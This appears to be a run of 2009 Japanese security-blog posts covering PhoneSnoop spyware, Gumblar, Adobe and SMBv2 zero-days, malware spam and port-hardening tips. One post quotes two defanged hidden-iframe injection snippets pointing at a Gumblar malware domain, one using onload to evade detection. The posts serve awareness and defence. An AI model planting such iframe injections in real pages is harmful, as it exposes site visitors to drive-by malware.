BlackBerryからの会話はすべて聞かせてもらった！

ガラッ！って効果音が必要だったかな？
BlackBerry PhoneSnoop Application Used to Spy on Users
US-CERT is aware of public reports of a new software application called PhoneSnoop. This software allows an attacker to call a user's BlackBerry and listen to personal conversations. In order to install and setup the PhoneSnoop application, attackers must have physical access to the user's device or convince a user to install PhoneSnoop.

US-CERT warns about BlackBerry spyware app
PhoneSnoop – Turn a BlackBerry into a portable bug

BlackBerryの盗聴アプリ「PhoneSnoop」に要注意
RIM、BlackBerryの盗聴アプリに見解
RIMが調査したところ、PhoneSnoopは特定の電話番号からの着信で起動し、端末を盗聴デバイスに変えてしまうことが分かった。盗聴できるのは端末での通話内容ではなく、端末の周囲の音声であるといい、端末にセキュリティホールが存在するわけではないと説明している。
実際に盗聴するには、US-CERTが解説しているように標的となるユーザーの端末へPhoneSnoopを直接インストールする必要があり、攻撃手法の難易度は極めて高いという。

とりあえずは、端末の物理的操作が必要なようですが、BlackBerryユーザは自分の端末（あるいは会社の支給品）にどんなアプリがインストールされているか把握する必要があるということでしょう。
※上司が盗聴してるかも？とか考えるとちょっと怖い・笑

----------
Cisco to Acquire ScanSafe

Cisco Announces Intent to Acquire ScanSafe
SAN JOSE, Calif. – Oct. 27, 2009 – Cisco today announced its intent to acquire privately held ScanSafe, Inc.
お～
これは予想していなかった買収です。
Gumblarなどの解析結果は今後はCiscoから出されるのかな？（笑）

ともあれ、「おめでとうございます」。ということにしておきましょう。
Cisco、Webセキュリティ企業のScanSafeを1億8300万ドルで買収

----------
Gumblar calm down

Adobe Reader / Acrobatを狙う攻撃が減少【Tokyo SOC Report】
現在のところ鎮静化傾向にありますが、改ざんされたままのWebサイトもあるので、依然として注意が必要です。クライアントPCでご利用のアプリケーションを最新のバージョンへアップデートすることをご検討ください。

穿った見方をすれば、「目的は達したので戦略的撤退」を果たしただけかもしれません。何しろ５月末から今までずっと潜伏し、網を張っていた組織ですので・・・
この手の犯罪に憶測は禁物ですが。

被害とその実態および回復
新種の「Gumblar」PHPウイルスがはやっています
【警告】新種の「Gumblar」PHPウイルスの猛威　そのメカニズム
「やられ群」１・２・３の組み合わせがねずみ講を連想してしまうのは私だけ？（笑）
想像ですが、やられ群１と２に関しては、旧Gumblarによって盗まれたFTP Credential(s)の中から無作為に抽出したものではないか？と考えています。特に１群にはバーチャルホストに収容されているレンタルサーバを狙っている節があり、対策が難しい点を悪用しているような気がします。（ISPが実稼動機を停止できないため、ISPが各個にユーザへの感染確認などを行うハメになってしまい、結果的に時間稼ぎをされてしまう）

----------
iFrameインジェクションの進化

Evolution of Hidden Iframes

iframeを隠す手段としてよく使われているのが
＜iframe src="hxxp://gumblar .cn/ count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no＞＜/iframe＞
のように visible 属性を none にしたり、 style属性を hidden にしたりする手法です。あるいは、＜div style="display:none"＞のように、直前のdivブロックを非表示にすることもよく目にします。

今回新しく発見された手法は
＜iframe frameborder="0" onload="if (!this.src){ this.src='hxxp://gumblar .cn/ index.php'; this.height='0'; this.width='0';}" ＞dvexgqoexlsvajdiodgqvxswnifzmxo＜/iframe＞
onloadを使って、検出パターンから逃れようとしています。
インジェクション onload属性の利用

----------
DAY -27- Active Directory Ports

137 138 139 および 445 を外部に出し・外部から応答にしている方はさすがに減ったのではないか？とは思っていますが・・・・
Cyber Security Awareness Month - Day 27 - Active Directory Ports
他にも沢山使っています。

こうした Windowsサービスで使用されているポートのトラフィックは VPNを使っているのであればそのトンネルのみを許可、それ以外であれば基本的にはルータ・ファイアウォールでブロックしておいたほうが無難でしょう。
第4回　ネットワーク・セキュリティを実現する「Windowsファイアウォール」 -- 2005.06
もっとも、VPNを経由したADは、細切れになったファイルの転送が激しく遅いという NetBIOSの特徴で、使い物にならないほど速度が低下することがありますが・・・

----------
DAY -28- NTP 123UDP

Cyber Security Awareness Month - Day 28 - ntp (123/udp)

ケルベロス認証は使ってませんが、同期がときどき日単位で狂うことはありますね（苦笑）たぶん、何かの設定がおかしいのでしょうけど、放置していたら怒られそうなので同期頻度を上げたことはあります。

あと time_t()の2036/2038年問題なんかもあったような・・

----------
時間切れ

Google Safe Browsing STATUS:
サーバ堕ちてる（泣）

本日帰社予定～
EoF

ボスの日
1958年にアメリカで、経営者と部下の関係を円滑にする日として提唱され、アメリカ商業会議所に登録された。
アメリカではこの日に、ボスを昼食に招待したりプレゼントを贈ったりして日頃の労をねぎらう。
世界食糧デー
1945年10月16日に国際連合食糧農業機関 (FAO) が設立されたことを記念して、1981年に制定。

----------
Outlook Web Accessの変更を装ったマルウェアスパム

[DANGER]
You have (6) New Message from Outlook Microsoft
Outlook Web Access のアップデートを騙るspamが出回っているようです。

スパムで利用されるTargetted URLの応用
メールサーバーの管理者から、
「メールサービスのセキュリティアップグレードをしたのであなたのメールボックスの設定の変更してね」
というメールが届きます。
中略
「Outlook Web Access」のupdateと見せかける。
ここでマスクしている部分も、このスパムを受信した人のドメインです。徹底してます。

これは・・・かなり引っかかる人が多くなるかもしれません。
中身は、Zbotなのですがネ・・

Malware Spam Messages Related to Microsoft Outlook, SSL Certificates
Yet another round of Viral Spam
Server upgrade spam redux
Outlook Web Access Social Engineering Malware Scam
OWA Phish - a new vector
OWA Phish - a new vector (2)

と、各社・研究機関が一斉に警報を発しています。
とりあえず Microsoftの Outlook Web Access のアップデートは存在しませんので、無視しましょう。（仮にあったとしてもWindows/Microsoft Updateからアップデートされる性質のものです。

settings-file.exe -- 2009.10.14 6/41 (14.63%)

----------
サイボウズ製品

複数のサイボウズ製品におけるクロスサイトスクリプティングの脆弱性
ユーザのウェブブラウザ上で任意のスクリプトを実行される可能性があります。

開発者が提供する情報をもとに最新版へアップデートしてください。
※上記対象製品をイントラネット内でのみ運用している場合に、外部（インターネット網）から攻撃を受けることはございません。
・・・・・？

Cybozu Products Unspecified Cross-Site Scripting Vulnerabilities
指標:2

----------
Foxit vulnerability in zero day

脆弱性はAdobeよりも少ない！と豪語していたような気もしますが・・・
Foxit Reader Firefox Plugin Memory Corruption Vulnerability
Solution:
Do not visit untrusted websites or follow untrusted links.
Disable the Foxit Reader plugin in Firefox.

Re: Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox
Foxit reader was also vulnerable to the JPEG2000/JBIG2 decoder bug.
Makes me wonder how much code is common to both Adobes and Foxits PDF readers

過信は禁物です・・ということでしょうか

----------
Koobfaceだって負けてません

新型KoobfaceはFlashのアップデートプログラムを模倣
10月第3週の始め、ソーシャルエンジニアリングを利用したもっとも効率的なボットネットであるKoobfaceの管理者は、偽のYouTubeページに埋め込んだ、AdobeのFlashアップデートプログラムを真似る新たなテンプレートを使って、Facebook内でのキャンペーンを開始した。

キャンペーンとか言われると、正規のソフトの話のように捉えられそうですが・・
※USでは、よく使われる表現でもあります。

facebookを偽装した IRSスパム・フィッシング(ZeuS/Zbot)も相変わらずですので、注意が必要です。

----------
Microsoft salvaged Sidekick's Customer data

Microsoft Confirms Data Recovery for Sidekick Users
Data Restoration to Begin as Soon as Possible for Affected Customers.

Microsoft/Sidekickの大惨事、続報―「ユーザーデータの大部分、回復可能」と判明

MSの威信にかけて！がんばってください

----------
Microsoft FakeAV Collection

Scanti-ly Clad - Another Rogue Stripped by MSRT

恒例になった MSRT でブロックしている FakeAV の展覧会です。

Using Active Desktop to place text on the desktop background
のデスクトップが新鮮ですね（笑）

----------
New Injection : Opera Only?

Ncccnnnc .cn – Warning: Not Opera Only
Funny, it tries to make it look less suspicious adding this silly “Warning: Opera Only” comment. Browsers don’t read such comments and the code is executed in every browser.

WARNING Opera Only
としていますが、当然他のブラウザでも影響があります（苦笑）

----------
Day-15 Secure Email Ports

Cyber Security Awareness Month - Day 15 - Ports 995, 465, and 993 - Secure Email
折り返し点に達した SANS の Cyber Security Awareness Month特集。
今回は、なんだかよくわからないままに設定しているかもしれない Emailの特殊ポートです。

一般的な email 関連のポートは 25(smpt)と110(pop3)ですがセキュアメールを実装しているISP/サービスによっては以下のポート使用を推奨しているかもしれません。

Port995 : POP3 over SSL
Port465 : SMTP over SSL
Port993 : IMAP over SSL

しかし、一部のサービスにおいて、これらのSSL Certを自前の証明書（いわいる「オレオレ証明書」）を使用し、「セキュアメール」と謳っているところもありますので注意が必要です。

もちろん、正規の証明書を正しく運用している場合には、通常のメールよりも遥かに安全なやり取りが行われます。

----------
DNS-BH

New update: 124 new domains to block

そういえば、DNS-BL (blackholes.us)がドメイン失効しており、何も考えずにこのサービスを使用している人は注意が必要だと SANS が警告していましたね。
Check your email servers - blackholes.us DNSBL is dead
セキュリティのルールの変更はなかなか気が廻らないものです。

----------
３万円で警告？

小学生が親のカードで高額利用も～グリーが未成年ユーザー課金に上限設置
具体的には、ソフトバンクモバイルを利用している未成年ユーザーについて、月間での課金利用額の上限を3万円とする。これは、ソフトバンクモバイルの場合、課金利用額の上限が設定されておらず、暗証番号による認証も行われていないため。

３万円でいいの？
まず、最初に有料課金であることの警告を１円からでも発生させるべきだと思うんですが・・・

----------
iFrame

アップル、新たな動画形式「iFrame」を発表

紛らわしいからやめて・・・（苦笑）
でもいつか使われそうな商標だとおもってた人は多いはず（笑）

----------
Google Safe Browsing STATUS:
[goog-malware-hash 1.16470 update]
[goog-black-hash 1.42270 update]
Results: 347983 338853 (+9130)
Logged Total: 791562 781436 (+10126)

昨日の算数をミスってたようなきもする・・

EoF

通告されていたように、Adobe Acrobat/Reader のアップデート・パッチがリリースされました。
Second quarterly security update released for Adobe Reader and Acrobat

Adobe Readerを起動してヘルプメニューからアップデートしましょう。




しかし、相変わらずダウンロードセンターでは
Adobe Reader 9.1 - multiple languages
を落としてから
Adobe Reader 9.2 update - Multiple Languages
にアップデートさせるしか方法が無いようです・・

Adobe Reader for Windows

Mac用に至っては、9.1.3 を上にしている有様・・（嘆息）
Adobe Reader for Macintosh

空気読めない対応も相変わらずです。

Unix:
Adobe Reader for Unix

あと、どうしても旧版を使いたい人用に 8.1.7 及び 7.1.4が出されています。
Ver7 ラインナップは今年一杯(2009.12.28)でサポートが打ち切られることがアナウンスされていますので、そろそろ使用をあきらめましょう。
Adobe products and Enterprise Technical Support periods covered under the new Lifecycle Policy

Acrobatに関しては、それぞれ使用中（購入済み）のプロダクツに応じたアップデータが出されていますので、各個にアップデートしてください。

----------
Adobe Releases Security Bulletin for Adobe Reader and Acrobat

アドビ製品へのゼロデイ攻撃でマシンにバックドア--トレンドマイクロが警告
New Adobe Zero-Day Exploit

Latest PDF Zero Day Leads to Exploit Egg Hunt
技術検証 : Egg Hunter found signature 'eof'

EoF

世界郵便デー／万国郵便連合記念日
1874年10月9日に、全世界を一つの郵便地域にすることを目的とする 万国郵便連合(UPU) がスイスで結成されたことに由来。
そういえば政治の世界でも何かモメてましたね
トラックの日
「10」（ト）と「9」（ク）
東急の日
10 + 9ベタだ・・・
秋の八幡祭（高山祭）
　櫻山八幡宮
チェ・ゲバラ(エルネスト・ラファエル・ゲバラ・デ・ラ・セルナ) 1967年 銃殺される

----------
AdobeがReaderとAcrobatに（何か）があると発表

[IN ZERO DAY]マタカ
何かじゃわからん！ってですか？（苦笑）
Adobe Releases Security Bulletin for Critical Vulnerability
Adobe has released security bulletin APSB09-15 to alert users of a critical vulnerability in Adobe Reader and Acrobat. Adobe indicates that it has received reports of active exploitation of this vulnerability. Release of an update for this vulnerability is scheduled for Tuesday, October 13.

Security Advisory for Adobe Reader and Acrobat
There are reports that this issue is being exploited in the wild in limited targeted attacks; the exploit targets Adobe Reader and Acrobat 9.1.3 on Windows. Adobe Reader and Acrobat 9.1.3 customers with DEP enabled on Windows Vista are protected from this exploit. Disabling JavaScript also mitigates against this specific exploit, although a variant that does not rely on JavaScript could be possible. In the meantime, Adobe is also in contact with Antivirus and Security vendors regarding the issue and recommends users keep their anti-virus definitions up to date.
・既に攻撃が確認されている
・Acrobat 9.1.3で Vistaユーザで DEPが ONになっているユーザだけはこの攻撃を受けない
・JavaScriptをOFFにしても攻撃を回避できない

CVE-2009-3459(*reserved)
何もわかりません（苦笑）

scheduled for release on October 13
１３日までゼロデイっと

Adobe Acrobat Reader Remote Code Execution Vulnerability
Adobe Reader and Acrobat Advance Notification Multiple Unspecified Security Vulnerabilities
PoCはまだ無い模様
発見、報告したのは Chia-Ching Fang氏 (ICST.tw)です。

えーっと、どうすればいいんでしょうね（苦笑）

Vistaの人は Acrobat/Readerが 9.1.3で、DEPが有効になっていることを確認してください
そうでない人は 10/13 まで、信用できない PDFを開かないようにしましょう。
(Foxitあたりが安全である保障もありません)

New Adobe Vulnerability Exploited in Targeted Attacks
This vulnerability does not require Javascript. If you disabled Javascript in the past, it will not protect you in this case.
JavaScriptに全く関係ないわけですね・・・
Another workaround I found helpful: You can "clean" PDF documents by first converting them into another format (like Postscript) and then back into PDF. However, this is not 100% certain to remove the exploit and you may infect the machine that does the conversion as it will likely still use the vulnerable libraries to convert the document. But the likelyhood of this happening is quite low.

PDFを１回EPSか何かに保存し、もっかいPDFに戻せと・・・
でも、脆弱性ライブラリを残したコンバータを使ったら意味が無いと（レア・ケースらしいですが）・・・・

Acrobatなどに未解決の脆弱性、米13日にパッチ公開
米国時間の13日にはReaderとAcrobatの複数の脆弱性を解決する四半期パッチの公開を予定しており、今回の脆弱性もこのパッチで対処する方針。それまでの間、ゼロデイ攻撃を回避するためにJavaScriptを無効にするなどの対策を紹介している。
JavaScriptを無効にしてもダメだって書いてある気もするんですけど・・・？

----------
Microsoft Patch(TM) at October

October 2009 Bulletin Release Advance Notification
For October we are releasing 13 bulletins (eight critical and five important), addressing 34 vulnerabilities, affecting Windows, Internet Explorer, Office, Silverlight, Forefront, Developer Tools, and SQL Server. Most of these updates require a restart so please factor that into your deployment planning.

えーっと
８の致命的修正
５の重要修正
ってコトですかネ

SMBv2の問題と、IISのFTP経由攻撃の問題の修正を含んでいるようです。

Adobeの修正と同じ Oct.13 (日本では14日・水曜日頃）を予定しています。

----------
逆転無罪

Winny 開発者の金子勇氏、無罪判決

とりあえずはお疲れ様でしたって感じでしょうか
（上告されそうですが・・）
Winny開発者の無罪判決は「意外であり疑問」、ACCSがコメント

そして・・・
Winnyウイルスでかんぽ生命の顧客情報が流出、1万3500件超の規模
あーあ・・
簡易保険システム

----------
Day 8th -- Port 25

Cyber Security Awareness Month - Day 8 - Port 25 - SMTP

SMTP(Simple Mail Transfer Protocol)で使用される標準ポート。
最近は OP25B(Outbound Port 25 Blocking)により、ISP側で特定のサーバ以外の送信をブロックしていることが多いと思います。更に IP25Bによって、非固定IPからの25番受信を拒否するケースも増えています。
それでもspamは一向に減らないわけですが・・・

----------
Koobface ８つの謎

8 Things You Probably Didn’t Know About KOOBFACE

ふむふむ・・
というか、Facebookのユーザが国内にあまり居ないのでピンとこない部分が多いです。

----------
DNS-BH updated

[Block List]
New Update: trojans, rogues, zeus domains
ZeuS/Zbotのドメインが相変わらず増加の一途をたどっています。

----------
Compromisted

Isuzu Turkey Web Site Compromise

いすゞのトルコ法人のサイトが陥落、iframeインジェクションを受けていた模様です
現時点でリダイレクト先は接続不能。

最近このタイプのインジェクションがあちこちで見受けられます。

----------
WOT ride on Chrome

WOT for Google Chrome Web browser
Web上のアドレスリンクに 危険、安全の指標を付けるプラグイン Web of Trust がついに Chrome に対応しました。

GSB（標準実装）と併せて、更に安全なサーフィンを行えることでしょう。（タブンネ）

----------
バルマ～

バルマー氏、マイクロソフトのライセンシングは複雑すぎると認める

ほんとに何とかしてくださいよ（苦笑）

----------
台風一過

Google Safe Browsing STATUS:
[goog-malware-hash 1.16304 update]
[goog-black-hash 1.41766 update]
Results: 337447 (-1946)
※収集した過去感染履歴を含むと、現在 : 749691

EoF

まず、以下のOSのユーザ

は、FIX IT を有効にして塞いでおきましょう。
マイクロソフト セキュリティ アドバイザリ: SMB の脆弱性により、リモートでコードが実行される

SMBv2 Zero Day Exploit Code Publicly Released
The good news is those who have tested the exploit claim it is only able to remotely execute code on vulnerable systems when those operating systems are run in VMware environments. If run on a physical machine, allegedly the public exploit code simply causes the machine to crash - admittedly a still-serious form of denial of service attack, but an improvement over remote code execution. If true, this lessens the likelihood of a wormable exploit (at least based on the code as it currently exists).

Windows SMB2 exploit now public; Expect in-the-wild attacks soon
The exploit, created and released by Harmony Security’s Stephen Fewer, provides a clear roadmap for hackers to plant malware or open backdoors on Windows Vista Service Pack 1 and 2 as well as Windows 2008 SP1 server.

US/CERTより再警告
Microsoft Releases Fix It for SMB Vulnerability

日本語記事:
Windows SMB v2の脆弱性を突く新たな攻撃コードが公開

Microsoftの予想される反応：
所定の認証機関による脆弱性の発表ではないため、きわめて遺憾であり事実関係の確認を行っている最ちゅ・・・